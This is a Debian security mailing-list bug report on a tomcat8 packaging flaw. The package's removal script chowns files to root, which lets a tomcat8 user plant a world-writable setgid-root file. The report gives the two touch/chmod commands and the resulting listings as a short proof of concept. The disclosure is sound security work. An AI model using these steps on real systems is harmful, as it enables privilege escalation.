[Secure-testing-team] Bug#845385: Privilege escalation via removal
Paul Szabo
paul.szabo at sydney.edu.au
Tue Nov 22 22:35:34 UTC 2016
Package: tomcat8
Version: 8.0.14-1+deb8u4
Severity: critical
Tags: security
Having installed tomcat8, the directory /etc/tomcat8/Catalina is set
writable by group tomcat8, as per the postinst script. Then the tomcat8
user, in the situation envisaged in DSA-3670 and DSA-3720, see also
http://seclists.org/fulldisclosure/2016/Oct/4
could use something like commands
touch /etc/tomcat8/Catalina/attack
chmod 2747 /etc/tomcat8/Catalina/attack
to create a file:
# ls -l /etc/tomcat8/Catalina/attack
-rwxr-Srwx 1 tomcat8 tomcat8 0 Nov 23 09:00 /etc/tomcat8/Catalina/attack
Then if the tomcat8 package is removed (purged?), the postrm script runs
chown -Rhf root:root /etc/tomcat8/
and that will leave the file world-writable, setgid root:
# ls -l /etc/tomcat8/Catalina/attack
-rwxr-Srwx 1 root root 0 Nov 23 09:00 /etc/tomcat8/Catalina/attack
allowing "group root" access to the world.
Cheers, Paul
Paul Szabo psz at maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/
School of Mathematics and Statistics University of Sydney Australia
More information about the Secure-testing-team
mailing list